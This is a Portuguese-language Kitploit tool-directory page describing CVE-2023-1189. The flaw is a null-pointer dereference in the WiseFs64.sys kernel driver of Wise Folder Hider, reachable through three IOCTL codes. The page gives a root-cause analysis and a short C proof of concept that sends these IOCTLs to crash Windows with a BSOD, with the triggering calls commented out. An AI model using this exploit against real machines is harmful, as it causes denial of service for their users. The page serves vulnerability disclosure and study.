Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-1189 — CVE-2023-1189 PoC e Exploit | Kitploit
Ferramentas/GitHubGitHub/le0s1mba/cve-2023-1189
Análise de VulnerabilidadesExploraçãoExploração de Binários
GitHuble0s1mba/cve-2023-1189

CVE-2023-1189

CVE-2023-1189 PoC e Exploit

Ver Repositório
há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-1189

1. Visão Geral

ItemDetalhes
CVE IDCVE-2023-1189
Tipo de VulnerabilidadeEncerramento ou Liberação Impropria de Recurso (CWE-404)
Software AfetadoWiseCleaner Wise Folder Hider
Componente VulnerávelWiseFs64.sys (Driver do Kernel)
Versão Vulnerável4.4.3.202
CVSSNVD - 5.5 (Médio), VulDB - 3.3 (Baixo)
Data de Divulgação06/03/2023

Esta vulnerabilidade permite que um invasor, com privilégios de usuário, force uma Desreferência de Ponteiro Nulo no kernel por meio de um IOCTL específico, levando o sistema ao estado BSOD. Trata-se de uma vulnerabilidade de Negação de Serviço Local.

2. Causa Raiz

A vulnerabilidade CVE-2023-1189 ocorre no driver de kernel WiseFs64.sys criado durante a instalação do programa Wise Folder Hider versão 4.4.3.202.

O fluxo geral da vulnerabilidade é o seguinte:

image.png

Analisando o fluxo em detalhes:

DriverEntry func

Primeiramente, na função DriverEntry, a função dispatchDeviceControl é definida no índice 14 da Tabela de Despacho.

Isso faz com que todos os IOCTLs enviados para \\.\WiseFs sejam direcionados para dispatchDeviceControl.

dispatchDeviceControl func

Ao entrar na função dispatchDeviceControl, primeiro é verificado se o dispositivo é um dispositivo de controle. Se for, a execução segue para a função handleControlDeviceIoctl.

handleControlDeviceIoctl func

A função handleControlDeviceIoctl contém a lógica que processa os códigos IOCTL reais.

Dentre vários códigos IOCTL, os códigos 0x222400, 0x222404 e 0x222410 omitem a verificação se o valor do Buffer é nulo ou não.

Portanto, se um desses IOCTLs for chamado com Buffer nulo, o driver acessará o Buffer, causando uma Desreferência de Ponteiro Nulo e levando ao BSOD.

3. PoC & Exploit

root@kitploit:~
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>

#define SymLinkName L"\\\\.\\WiseFS"

HANDLE hDevice;

int main(int argc, char* argv[]) {
	DWORD dwWrite = 0;

	hDevice = CreateFileW(SymLinkName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDevice == INVALID_HANDLE_VALUE) {
		printf("failed to CreateFile\n");
		return 1;
	}

	// case 0x222400
	// DeviceIoControl(hDevice, 0x222400, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222404
	// DeviceIoControl(hDevice, 0x222404, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222410
	// DeviceIoControl(hDevice, 0x222410, NULL, 0, NULL, 0, &dwWrite, NULL);
	
    CloseHandle(hDevice);
    return 0;
}

4. Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2023-1189
  • https://www.cve.org/CVERecord?id=CVE-2023-1189
  • https://cwe.mitre.org/data/definitions/404.html
  • https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/CVE-2023-1189
Baixar ferramenta